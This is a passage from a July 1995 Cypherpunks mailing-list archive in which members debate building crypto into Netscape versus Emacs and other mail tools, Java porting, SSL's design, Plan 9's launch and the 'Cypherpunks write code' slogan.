Eng.Auburn.EDU (Doug Hughes) Date: Thu, 20 Jul 95 09:13:30 PDT Subject: Netscape the Big Win In-Reply-To: <199507201449.HAA02245@dvorak.jta.edd.ca.gov> Message-ID: >on Wed, 19 Jul 1995 20:24:31 -0800 Douglas Barnes wrote: >> available on Suns running Solaris 2.4 and PCs running Windows NT. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >Are there any plans to port JAVA to a REAL operating system? Support >for crypto needs to be ubiquitous to work. Start with the fanatics >(Linux and FreeBSD) and the other platforms will quickly follow (often >ported by the afore mentioned fanatics so that the departmental server >can run the same code as their desktop box :-). > > Dave Otto - Vinimus, Vedimus, Dolivamus > http://ACM.org/~daveotto/ http://ACM.org/~daveotto/linux.html/ > dave at dvorak.jta.edd.ca.gov daveotto at acm.org > "Pay no attention to the man behind the curtain!" [the Great Oz] > finger DaveOtto at ACM.org/or server for PGP 2.6 key <0x3300e841> > > > There are java ports in progress for several OS's. Linux is among them and there is a special mailing list for the linx port of java. Check the sun home page for porting information, mailing lists, and new developments. By the way, the current version of Java is Alpha2 release. Expect interface and programmatic changes before a real version comes out January time frame. -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug at eng.auburn.edu "Real programmers use cat > file.as" From rjc at clark.net Thu Jul 20 09:32:10 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 20 Jul 95 09:32:10 PDT Subject: Netscape the Big Win In-Reply-To: <40697.pfarrell@netcom.com> Message-ID: <199507201631.MAA18946@clark.net> > The current trend is to bundle all types of functionality into huge > monolithic programs. Add mail to netscape, add encryption, add ... > > Yet most of the computers people use are multi-windows, and soon most > will even be multi-tasking. > > Why are all-in-one programs so preferable to using the windowing [why favor the browser approach of sticking all the client functionality for various protocols into one program] The answer is: integration. While TRN is a great newsreader, and Eudora's a great mail reader, etc, if I read a post in TRN or a message in Eudora, there is no hyperlinking. If I see a link or reference, I have to cut-n-paste it into an ftp session or a web browser. If "helper applications" for web browsers could talk bidirectionally with the browser in a meaningful way (display output in the window for example, and use the browser to open and fetch data), there would be no need for all this. Isn't it much better to have inline jpeg viewing in a page rather than launching 10 jpeg viewers externally? Since not all operating systems have a standard cross-platform technique of interapplication communication, it makes porting these helper apps and browsers all the more difficult. The future is in component systems like OpenDoc and HotJava. With HotJava, you can once again return to "shopping around for the best mail reader application", however this time, it will be a program you can run from within the browser. Not only that, but you can automagically download it just by going to a home page, or placing the mail reader application in your own homepage. It used to be that each media type was stored in a different document, and a special tool had to be used on each file. Now, all media types can coexist in the same document, and the "handlers" for each media type are packaged into the document too (or, links on where to find them) I wouldn't be surprised if in 5-10 years, your operating system basically looks like a cross between Netscape, OpenDoc, and HotJava. The "browser" would be ubiquituous, and local/LAN/WAN data would be treated transparently. -Ray From nobody at valhalla.phoenix.net Thu Jul 20 09:35:19 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Thu, 20 Jul 95 09:35:19 PDT Subject: Plan 9 OS (NewsClip) Message-ID: <199507201635.LAA24498@ valhalla.phoenix.net> AT&T Launches Plan 9 Operating System Murray Hill, NJ, July 19 -- AT&T has announced a new distributed operating system, called Plan 9. The new system was developed by some of the same people who created the Unix operating system, and the terms on which AT&T is making it available are reminiscent of Unix, but the company stressed that Plan 9 is not Unix. Named for the cult science fiction movie Plan 9 From Outer Space, the Plan 9 operating system is designed to work well on networked computers. It has components for "terminals," or desktop systems, for file servers, and for central processing unit (CPU) servers. Plan 9 is designed to deal with multiprocessing systems as CPU servers. It supports four major hardware architectures: Intel Corp.'s x86 line (including the Pentium chip), MIPS Computer Systems Inc. processors, Sun Microsystems Inc. SPARC chips, and Motorola Inc.'s 68020 and 68040 processors. During simultaneous press conferences in Murray Hill and San Francisco, connected by a teleconference link, Rob Pike, one of the Plan 9 developers, said the new system is meant to combine some of the advantages of Unix with some of those of low-cost hardware. "We basically started by noticing some things that we liked and didn't like about Unix and liked and didn't like about workstations," Pike said. Pike stressed that while Plan 9 borrows some ideas from Unix, it is quite different and is not compatible with Unix. He went on to say that AT&T does not expect Plan 9 to compete with major commercial operating systems such as Unix and Microsoft Corp.'s Windows NT. "This is not the next Unix," Pike said. It appears in fact that the most promising commercial market for Plan 9 might be in embedded systems. During the press conference, AT&T researchers and officials repeatedly mentioned the possibility that Plan 9 might be built into consumer devices and other intelligent electronic devices, an area where no standard operating system predominates today. AT&T plans to make Plan 9 available for commercial licensing to other vendors for an initial fee of $200,000, plus per-copy fees that will amount to 20 percent of the resale price of commercial software or two percent of the selling price of hardware with Plan 9 built in, said Paul Fillinich, marketing manager for AT&T's Software Solutions operation. Single copies of Plan 9 will also be available for research and educational use, but Fillinich stressed that the company will not provide technical support. "We will replace the media should it fail," he said. For commercial licensees there may be some sort of support in the future. "We are contemplating this," Fillinich said. "However, we haven't decided what the offering will be." Publisher Harcourt Brace & Co. will distribute Plan 9 for AT&T. The full package, including a CD-ROM, four diskettes, and two manuals, will cost $350. The manuals are available on their own for $125. Apparently wishing to avoid a repeat of the way Unix splintered into many different versions, AT&T is specifying that while source code for Plan 9 will be made available to research and educational users, any changes they make will become AT&T's property so that they can be incorporated in the base code. "We want only one Plan 9," Fillinich said. "We think the industry wants only one Plan 9." The minimum hardware needed to run Plan 9 is an Intel 386 processor with eight megabytes (MB) of memory and 40MB of available hard disk space, said Phil Winterbottom, another of the Plan 9 developers. An optimal arrangement would include a dedicated file server and multiple desktop terminals, he added. Further information about Plan 9 is available on AT&T's Plan 9 home page on the World Wide Web, at http://plan9.att.com/plan9/index.html. -- From rjc at clark.net Thu Jul 20 09:36:52 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 20 Jul 95 09:36:52 PDT Subject: Netscape the Big Win In-Reply-To: <199507201449.HAA02245@dvorak.jta.edd.ca.gov> Message-ID: <199507201636.MAA20551@clark.net> > > on Wed, 19 Jul 1995 20:24:31 -0800 Douglas Barnes wrote: > > available on Suns running Solaris 2.4 and PCs running Windows NT. > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > Are there any plans to port JAVA to a REAL operating system? Support > for crypto needs to be ubiquitous to work. Start with the fanatics > (Linux and FreeBSD) and the other platforms will quickly follow (often > ported by the afore mentioned fanatics so that the departmental server > can run the same code as their desktop box :-). Go to http://java.sun.com and join the java porting list and also the linux porting list. Suffice it to say, it is being worked on by many people. The next port coming out will be for the Mac. Linux will probably be right after that. The problem with porting HotJava (and Java) is that it uses Solaris Threads, and if your operating system doesn't have a lightweight process/thread library, you have to port one, or write your own. Secondly, HotJava uses OpenWindows, and third, it relies on some Solaris specific memory mapping tricks. (I've heard, there's also some endian problems) -Ray From tcmay at sensemedia.net Thu Jul 20 10:05:30 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 10:05:30 PDT Subject: S/MIME and the Future of Netscape Message-ID: With regard to SSL and Netscape not being open to outside developers, several leading e-mail outfits, including Qualcomm, Netscape, Frontier, etc., are working on an interoperable secure e-mail standard called "Secure/MIME," or "S/MIME." And even if Netscape will not allow outside developers--like J. Random Cypherpunk--access to the code internals and incorporaton of his work into Netscape's final compiled code, not surprisingly, there are still numerous options for hooking in. Hal Finney described some ideas, and I'm sure more exist. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From hfinney at shell.portal.com Thu Jul 20 10:23:43 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 20 Jul 95 10:23:43 PDT Subject: Netscape the Big Win Message-ID: <199507201722.KAA10382@jobe.shell.portal.com> From: Adam Shostack > Actually, it also supports Kerberos (not relevant to most of > us), and PGP messaging. Although a KCA would be needed before anything > useful came of the PGP support, at least its there. It appears that support for PGP messaging has been removed from the July 1995 SHTTP draft. So it's X.500 all the way. From: Steven Champeon - Imonics Development > The one "advantage" to SSL that they were pushing over SHTTP was that > SSL is a socket-level encryption mechanism, as opposed to protocol- > level. It doesn't conflict with SHTTP except in terms of adding to > the processing time. > > I guess I don't see why SSL is so awful from a crypto standpoint. > Could someone a bit more educated on the nuts and bolts clue me > in on its weaknesses? As compared to other schemes, perhaps? Frankly I don't think SSL is particularly weak cryptographically. It has gone through several revisions as various problems were pointed out. The one thing I would note is that there is considerable known plaintext being exchanged in the handshake. This helps with key guessing and will be the foundation for the SSL challenge that Adam Back is organising. IMO at least some of this material could have been sent encrypted with the public key so that an eavesdropper couldn't know it. OTOH this might have run afoul of the NSA's rules on export for at least the 40 bit version since you'd have more than 40 bits of secrecy in effect. SSL includes a 16 byte checksum with each packet. IMO this is overkill and wasteful for small packets. One thing about SSL is that it provides both secrecy and immunity to certain kinds of active attacks. These big checksums include a sequence number and key information to prevent replay attacks. For some purposes you might be satisfied with secrecy and not want to pay this overhead. I think a lot of the criticism of SSL was based on the thought that it would be obsoleted by the new IP secure protocols. That may be true eventually but SSL is here today, in use. Order something from Netscape and it is secured with SSL. Buy the domestic version if you want real security. For IP, many of us we will have to wait until the new IP protocols get built into our OS's and other infrastructure. People have also objected to the use of the X.500 certificate approach. But that seems to be de rigeur for any serious Internet standard these days. IMO the real solution is to come up with a PGP-like X.500 certificate maker so people can easily set themselves up as Certificate Authorities and go about their business while the anal hierarchy fans argue about liability. Actually I think there is a PD certificate maker around, possibily from Eric Young down under. Hal From patl at skyclad.lcs.mit.edu Thu Jul 20 10:25:44 1995 From: patl at skyclad.lcs.mit.edu (Patrick J. LoPresti) Date: Thu, 20 Jul 95 10:25:44 PDT Subject: Netscape the Big Win Message-ID: <199507201725.NAA22141@skyclad.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- >>>>> "tcmay" == Timothy C May writes: tcmay> Integration of crypto into Netscape is thus the Big Win. tcmay> I felt this was the case as far back as last fall, but my tcmay> recent experiences tell me this is more important than tcmay> ever. Integration of PGP and other crypto routines into Tin, tcmay> Pine, Elm, Joe, Emacs, etc., is just not as important. Careful here. Deliberately or not, you are marginalizing the hard work of dozens of people, including me. You are suggesting our work should have been done for Netscape instead, a program that a) is not free software (FSF sense); b) has no mail reader; and c) has no extension language. Oh, and d) is horrendous as a news reader. The packages that you implicitly denigrate provide far and away the best interfaces to PGP available today. They are written with the tools available, whether it's a Windows shell, a hacked version of Elm, or an Emacs Lisp package. Maybe Netscape will include a mail reader someday. Maybe Netscape will include Java as an extension language someday. But until that day, the only people who can put crypto into Netscape are the folks at Netscape Communications. tcmay> IBM just paid nearly $3 billion for Lotus, largely for the tcmay> "common platform" of Lotus Notes. I believe Netscape is an tcmay> even more important common platform, and will displace Notes. Netscape is not a platform. It is a browser. It is only useful for viewing content that others have created, with a user interface that any idiot can use. Consequently, yes, it is very popular with the masses and will become more so. tcmay> The relevance for Cypherpunks interested in writing code is tcmay> that, in my carefully considered opinion, writing for Netscape tcmay> and other Web browsers is the Big Win. Even over Windows tcmay> (except Windows browsers, of course). Can you name a platform for which it is possible to write a PGP front end, but for which none has been written? If it is ever feasible to do what you suggest, someone will do it; your musings will have no effect on that. If you want to make a difference, try writing some code yourself... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface iQCVAwUBMA6Rg3r7ES8bepftAQG4egQA2QFjXo5wgVOCtz2qGkgBbw80F4U80C1p d1noVQN95tFYc1vjgk0ftp8n5stURtuD6MEoHNoKDOQgCIzbPlEC9rIETAzW1kfd GTG8DzRqkcY1YqrTEnLoNiUswIfkVaquf9JrWNSuPKzLZ+IsUto1SxxNjk0fR7pf ou4k3Fo+3yQ= =BpNr -----END PGP SIGNATURE----- From tcmay at sensemedia.net Thu Jul 20 10:32:13 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 10:32:13 PDT Subject: Netscape the Big Win Message-ID: At 3:18 PM 7/20/95, Pat Farrell wrote: >The current trend is to bundle all types of functionality into huge >monolithic programs. Add mail to netscape, add encryption, add ... > >Yet most of the computers people use are multi-windows, and soon most >will even be multi-tasking. > >Why are all-in-one programs so preferable to using the windowing >capabilities that are built into every X-window, Mac or Windows system? > >Why not use the best mail client, another best webcrawler, and yet another >news reader? Speaking for myself, consistency of user interface. To that extent, Netscape (or Lotus Notes, in a different context) becomes the "operating environment" for the user, the place where he does his work. The News reader in Netscape 1.1N is as good as the main "separate" news reader, NewsWatcher, for the Macintosh, and has some added benefits. For example, URLs in News postings automatically show up as clickable items, which can be jumped to immediately. (Other News programs _could_ do this, and maybe some of them do, but not on the Macintosh, at this moment.) >Microsoft has been preaching the use of OLE and component programs as its >development vision for 2+ years, Macs have been popular for ten years, >why is the trend still towards adding every possible bell and whistle >to single programs? I don't know why "componentware" has not taken off. But it hasn't. OpenDoc and OLE 2 are coming, but slowly. Big programs tend to grow because they can increase market share by adding capabilities, by pulling in more customers. We might prefer a world of smaller apps, with componentware pieces, but it rarely happens. And I'm not going to use half a dozen small programs, each doing slightly different things and having different commands, when one will do nicely. (I could list other pluses and minuses, a la my outline FAQ, but here's just one more important item: cross-compatibility. Namely, with N smaller programs in use, of varying versions, incompatibilities and even crashes can result all too often ("We have discovered that MailMuncher 2.12 does not work with NewsNabber 1.1."). At lest with something like Netscape, a certain amound of cross-operability is likely, for various reasons.) In any case, while I respect the views Pat is expressing, about componentware and "small is better" approaches, the market is voting with its feet for apps like Netscape, which are becoming the main programs folks will use for communication, News reading, and Web surfing. >With components, it wouldn't be hard to have a universal >Encryption/Signature module. It would get arround any propriatary >restriction that vendors may or may not try to enforce ("can Netscape be >extended or not" becomes moot). So go ahead and do it! I've been waiting for many years for such things. To state an obvious non-crypto use of such "modules," why do all major word processing and page layout apps have their own "dictionaries"? Why do I have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That there have not been "dictionary modules," for many and sundry reasons, is telling. (Before anyone mentions it, one can on the Mac use things like "Thunder" instead of the local dictionaries...this is not the same as a module usable by all programs, but instead is a user choice to bypass the local dictionaries. We could quibble for hours about whether this is in fact a universal module or not. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From patl at skyclad.lcs.mit.edu Thu Jul 20 11:02:41 1995 From: patl at skyclad.lcs.mit.edu (Patrick J. LoPresti) Date: Thu, 20 Jul 95 11:02:41 PDT Subject: Netscape the Big Win Message-ID: <199507201802.OAA22155@skyclad.lcs.mit.edu> -----BEGIN PGP SIGNED MESSAGE----- >>>>> "pfarrell" == Pat Farrell writes: pfarrell> Why are all-in-one programs so preferable to using the pfarrell> windowing capabilities that are built into every X-window, pfarrell> Mac or Windows system? pfarrell> Why not use the best mail client, another best webcrawler, pfarrell> and yet another news reader? The problem is that existing operating environments do not, in general, provide good facilities for the kind of tight integration you really want. Besides, there is nothing wrong with a monolithic application, as long as it provides a sufficiently rich extension language. Take Emacs, for example. Emacs is a monolithic application, but I use different Lisp packages to read news, handle mail, and develop software. (I occasionally even just edit text.) Moreover, I have co-authored a Lisp package to hook PGP functions into *every* Emacs mail and news package, without ever talking to the authors of those packages. In general, any package can be written to seamlessly integrate with any other. In addition, all of these packages work without modification on every variant of Unix, on VMS, on Windows NT, and sometimes even on DOS. I can write in beautiful (and safe) Lisp, and let the Emacs maintainers worry about the idiosynchracies of each operating system. The problem with Netscape currently is that all of their packages are *built in* by Netscape Communications. That is why they have no mail handler, and why their news reader sucks, and why it is impossible for any of us to fix these things or add a PGP front end. Java looks somewhat promising; with it, perhaps Netscape can become a platform-independent system for writing packages to manipulate and display hypertext. It would be like an Emacs for hypertext, but with a crufty extension syntax and no source code. And a user base 1000 times as large... pfarrell> Microsoft has been preaching the use of OLE and component pfarrell> programs as its development vision for 2+ years, Macs have pfarrell> been popular for ten years, why is the trend still towards pfarrell> adding every possible bell and whistle to single programs? These approaches suffer for two reasons. First, it's a pain to incorporate the same basic display code into every package. Second, it's a pain to rewrite the same basic display code for every window system. (Especially when "every window system" means Microsoft, Macintosh, and X.) Other subsystems than display have similar problems (networking comes to mind), but I think display is the major pain in the groin. What Netscape could do is provide the engine for hypertext display, with a sufficiently rich and simple extension language that it would be easy to write new modules. Someone would probably write a decent news reader. Someone else would write a mail handling package. Someone else would write a PGP interface. And so on. Netscape would need to provide other functions across platforms, like TCP sockets, but that isn't impossible: Emacs has done all of this (save graphical display) for over a decade. Gosh, we might find ourselves using 1980 technology by the year 2000. I don't know enough about Netscape's plans for using Java to know whether any of this is likely to happen. I'm not even sure I want to see it happen. But it would be interesting. Cheers. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface iQCVAwUBMA6aLHr7ES8bepftAQEIVgP9G8p4lV1+Uc+6cpLZW4hMF+k7CYYp2Jp6 xh0qZXW0Sd7STPn+sP/fGPvErauGTlDiyIoW5bTJ9srITtFN8U1Yr7QollQZPqUa 5Rhbu7LjFTmixpdo0wiDTuUiRObnoE4Pj+/27EiamEqG160TjGiHDyCodh/eyFWS 8+R/yT5RCPw= =pja4 -----END PGP SIGNATURE----- From rjc at clark.net Thu Jul 20 11:51:19 1995 From: rjc at clark.net (Ray Cromwell) Date: Thu, 20 Jul 95 11:51:19 PDT Subject: Netscape the Big Win In-Reply-To: <199507201802.OAA22155@skyclad.lcs.mit.edu> Message-ID: <199507201850.OAA06558@clark.net> [extension languages] > Java looks somewhat promising; with it, perhaps Netscape can become a > platform-independent system for writing packages to manipulate and > display hypertext. It would be like an Emacs for hypertext, but with > a crufty extension syntax and no source code. And a user base 1000 > times as large... The "crufty" extension syntax, is a simplified and improved C++, with all the features any lisp extension has, minus closures. For user interface work, and applications existing in a larger environment, object oriented languages are superior. LambdaMOO shows lots of evidence for this. Sun, by choosing a C++ syntax for Java, gains a tremendous advantage by allowing C/C++ programmers to translate their experience to Java programming rapidly. In fact, I wish Java had actually been the real C++. C++ suffers from not having garbage collection, and from overreliance on pointer manipulation. Now, if only someone can convince Sun to add operator overloading to Java for the final release..... (really useful for BigInt programming) (netscape may not release source code, but the full source code to hotjava is available) -Ray From mikecal at microsoft.com Thu Jul 20 12:09:40 1995 From: mikecal at microsoft.com (Mike Calligaro) Date: Thu, 20 Jul 95 12:09:40 PDT Subject: cypherpunk "Zen" victories Message-ID: <9507201945.AA24257@netmail2.microsoft.com> Vladimir's post was very good. I only take issue with the last bit. <> So long as you remember that when these things come out we still need to scream and yell about them. The Rimm Job is not a victory simply because Rimm was crazy. It's a victory because many people took the time to criticize it and many others took the time to inform the masses of that criticism. These attacks may go in our favor, so long as we direct them in the right direction. There's something Zen in that as well. Don't punch your charging opponent. Instead misdirect hir energy a bit and let hir run into that wall behind you... From tcmay at sensemedia.net Thu Jul 20 12:32:25 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 12:32:25 PDT Subject: Netscape the Big Win Message-ID: At 5:25 PM 7/20/95, Patrick J. LoPresti wrote: >>>>>> "tcmay" == Timothy C May writes: > > tcmay> Integration of crypto into Netscape is thus the Big Win. > > tcmay> I felt this was the case as far back as last fall, but my > tcmay> recent experiences tell me this is more important than > tcmay> ever. Integration of PGP and other crypto routines into Tin, > tcmay> Pine, Elm, Joe, Emacs, etc., is just not as important. > >Careful here. Deliberately or not, you are marginalizing the hard >work of dozens of people, including me. You are suggesting our work >should have been done for Netscape instead, a program that a) is not >free software (FSF sense); b) has no mail reader; and c) has no >extension language. Oh, and d) is horrendous as a news reader. No offense, but "marginalizing" is what I love to do more than anything! Seriously, the world is what the world is. I really don't care about "FSF" one way or the other, and will join the rest of the world (apparently) in using Netscape. And yes, I am "marginalizing" the work that anyone does on "fringe" projects like Linux, which will likely always remain in the ghetto of Unix hackers who want a cheap Unix running on their cheap 486 boxes...it just ain't gonna take over inside corporations or amongst the many folks like me. Frankly, one of the great boons of my current setup is that I can completely get away from Unix tools and commands, away from my Unix shell account at Netcom, away from the arcane commands that vary from program to program, away from tin and elm and emacs...my fingers are already forgetting the emacs commands! (Those of you like Unix, fine. I agree it is useful for many things, so I'm not trying to debate Unix vs. the world. Just giving my perspective, and apparently the perspective of the many who are adopting the Web browsers as their "operating environments," insulated from the underlying cruft.) (If the GNU folks were to do an "open, extensible, Netscape workalike. this could be a win. Some may claim that Mosaic is/was that. We can debate this in separate thread.) I acknowledge that it has no mail reader, which is why I'm still using Eudora. But as soon as it does.... And the newsreader is a matter of taste...it does all I want it to do, and I'm a fairly heavy reader of News and contributor to Usenet groups. I survived with "tin" for several years, so anything is possible. >The packages that you implicitly denigrate provide far and away the >best interfaces to PGP available today. They are written with the >tools available, whether it's a Windows shell, a hacked version of >Elm, or an Emacs Lisp package. I don't think the packages I "denigrate" are the key to the future widespread use of crypto. Look at the actual usage patterns. >Netscape is not a platform. It is a browser. It is only useful for >viewing content that others have created, with a user interface that >any idiot can use. Consequently, yes, it is very popular with the >masses and will become more so. This makes my point. We may dismiss the masses as not being true Unix gurus or as being ignorant of Emacs, but this is how crypto will become truly ubiquitous. Not when people have to learn to compile code and create clients, but when they can send encrypted messages easily and transparently. That Qualcomm (Eudora), Netscape, Frontier, Microsoft, Lotus, and others are working on an interoperable "Secure/MIME" should be encouraging. >end, but for which none has been written? If it is ever feasible to >do what you suggest, someone will do it; your musings will have no >effect on that. If you want to make a difference, try writing some >code yourself... Please, your insulting tone ("your musings," "try writing some code..") is uncalled for. You have your views, I have mine. >From the large number of messages in this thread, apparently my points struck a chord. Like it or not, huge numbers of users are using Netscape and similar browsers. This is the basic reality. This is where the bulk of crypto users are going to be, not compiling ftp-gotten PGP into their Emacs configurations. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From rsalz at osf.org Thu Jul 20 12:50:10 1995 From: rsalz at osf.org (Rich Salz) Date: Thu, 20 Jul 95 12:50:10 PDT Subject: cypherpunk "Zen" victories Message-ID: <9507201950.AA24205@sulphur.osf.org> The Boston Globe has a weekly "magazine review" column. In yesterday's column they wrote about the Rimm piece, Time's followup, how the Internet got the story right, and fast, and how HotWired has a really good page on it. The column then reviewed the current Wired and said the magazine is now behind the times. In particular, contrasting it to the second(?) issue, "when they covered the Cypherpunks (sic) and their privacy agenda." From tcmay at sensemedia.net Thu Jul 20 13:02:10 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 13:02:10 PDT Subject: Netscape the Big Win Message-ID: At 4:31 PM 7/20/95, Ray Cromwell wrote: > I wouldn't be surprised if in 5-10 years, your operating system basically >looks like a cross between Netscape, OpenDoc, and HotJava. The "browser" >would be ubiquituous, and local/LAN/WAN data would be treated transparently. > This is precisely my view, although I try to call it an "operating environment," so as to get away from quibbling about what is and what is not a real OS. There were reasons why some folks like to do as much work as they could in an integrated environment like Emacs, regardless of the underlying OS flavor. Many folk still do, and they read News, send mail, etc., all from within Emacs. Same idea with Netscape...albeit with a different focus. And my guess, based on lots of indications, is that about a thousand times as many people will soon be doing this with Netscape as with Emacs, or elm, or pine, etc. Ray's comments about OpenDoc, HotJava, and other object-oriented tools fit this picture, I think. I am sorry that some folks heavily committed to the Linux route, or to Emacs, or to GNU/FSF, or to other approaches feel that their work is technically superior and deserves to be as popular as Netscape and simiar approaches, but reality is reality. (And I could be wrong on the way things will unfold. All I'm saying is that technology is a moving target, that plans have to change, and that ease of use will likely win out over technical sophistication. Folks who think the stronger technology will inevitably win should pick up a copy of a 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.) .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From tcmay at sensemedia.net Thu Jul 20 13:28:09 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 20 Jul 95 13:28:09 PDT Subject: "Cypherpunks Write Code" as a Putdown Message-ID: At 5:25 PM 7/20/95, Patrick J. LoPresti wrote: > If it is ever feasible to >do what you suggest, someone will do it; your musings will have no >effect on that. If you want to make a difference, try writing some >code yourself... I want to comment on this latest version of the "Cypherpunks write code" universal putdown. It's become common for debates on what is possible, what is likely, and what should be done for someone to "trump" the argument with the mantra of "Cypherpunks write code." In my posting on why I think Netscape and related operating environments represent the likeliest targets for widespread crypto use (the "big win" I used in my title), I did not whine that others ought to write code for me. I said that this is where users were going in massive numbers. Take it or leave it, as an analysis, but the "try writing some code" is a meaningless insult. The world is made up of bridge designers, legal experts, authors, chip designers, and on and on. Not just programmers. The line "Cypherpunks write code"--which is sometimes treated here with a reverence its origins do not support--was a reference to our view that technology, meaning actual deployment, was more important and interesting than yet more gabbing about liberty and privacy. And what is "writing code"? Is it only Perl and C? Or does defining what a remailer needs to do count as writing code? (Attendees at the first Cypherpunks meeting, almost 3 years ago, can confirm that I was the one who spend about two hours describing Chaum's mix work, and running the "remailer experiment"...we debated how a remailer could actually work, and Eric Hughes took on the task of writing the first one.) The "BlackNet" experiment I ran actually worked...the keys worked, the mechanisms worked, and the experiment has been used by many as an actual concrete illustration of how untraceable information markets will develop. An actual demonstration is worth more than mere speculation, and this was an actual demonstration. I call this "writing code," albeit not C code. (My actual code writing, in real computer languages, is oriented toward Mathematica, on my Mac, and Smalltalk Agents. Not all programming is oriented toward writing Unix tools, and I think the narrow interpretation of "Cypherpunks write code" to mean this is misleading.) In any case, even the ur-crypto hacker Zimmermann is writing very little actual code in PGP these days...does this mean he should "try writing some code" instead of doing what he apparently does best? In short, the insulting tone of many Cypherpunks these days is saddening. I plan to continue to speak my mind, to point out what I think are the more important routes to a desirable future, and to criticize what I think are dead ends and ghettoized approaches. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From perry at imsi.com Thu Jul 20 13:28:17 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 20 Jul 95 13:28:17 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <8AD9224.00030001F5.uuout@famend.com> Message-ID: <9507202028.AA05535@snark.imsi.com> MONTY HARDER writes: > After putting the appropriate tally mark on the sheet for the day's > mail, and sending out the response letter, yep. I don't expect Jan Meyers > to personally =ever= see my mail to her office. I only expect her > gruntlings to put that mark under "no" for the ______ Bill. You don't grok the "astroturf" concept. They'll note that letters look too similar and discount them. > But "folx" is exactly the kind of thing that tells the staffer that it > is =not= a form letter, You are right -- indicates someone who thinks it makes them a K00L D00D. I shan't say more. .pm From jlasser at rwd.goucher.edu Thu Jul 20 13:28:20 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 20 Jul 95 13:28:20 PDT Subject: Netscape the Big Win In-Reply-To: Message-ID: On Thu, 20 Jul 1995, Timothy C. May wrote: > There were reasons why some folks like to do as much work as they could in > an integrated environment like Emacs, regardless of the underlying OS > flavor. Many folk still do, and they read News, send mail, etc., all from > within Emacs. > > Same idea with Netscape...albeit with a different focus. And my guess, > based on lots of indications, is that about a thousand times as many people > will soon be doing this with Netscape as with Emacs, or elm, or pine, etc. > > Ray's comments about OpenDoc, HotJava, and other object-oriented tools fit > this picture, I think. Perhaps. I went to a computer store the other day, and saw almost two dozen different packages for e-Space access, each with different software... 2 or 3 with netscape, 2 or 3 with mosaic, everything else just custom packages, mostly. And from what I've heard about HotJava (not seen it yet, can't comment strongly) there needs another jump in PC power before it would be useful at the home level. Part of why we were stuck with DOS for so long is that it was what got the job done when the revolution happened. For that reason, I agree that HTML/Integrated browser solutions are what we're looking at, and at the same time don't have strong hopes for HotJava, though I would like to see it succeed. > I am sorry that some folks heavily committed to the Linux route, or to > Emacs, or to GNU/FSF, or to other approaches feel that their work is > technically superior and deserves to be as popular as Netscape and simiar > approaches, but reality is reality. All dogmas are ultimately Bad Things. But dogma gets stuff done in the short run. NetScape deserves to be popular; they followed the truth that most PC users like "pretty" better. And they made the best "pretty" software. > (And I could be wrong on the way things will unfold. All I'm saying is that > technology is a moving target, that plans have to change, and that ease of > use will likely win out over technical sophistication. Folks who think the > stronger technology will inevitably win should pick up a copy of a > 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.) Agreed. It's still too early to tell. This is like 100AD and we're trying to predict the Catholic Church of the twentieth century, trying to figure out fifteen years down our road. I really believe that's how fast we're moving right now, and we have to hit as many targets as we can. Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From jpb at shadow.net Thu Jul 20 13:37:31 1995 From: jpb at shadow.net (Joseph Block) Date: Thu, 20 Jul 95 13:37:31 PDT Subject: Netscape the Big Win In-Reply-To: <40697.pfarrell@netcom.com> Message-ID: <199507202041.QAA21408@shadow.net> re: > The current trend is to bundle all types of functionality into huge > monolithic programs. Add mail to netscape, add encryption, add ... [snip] > Why are 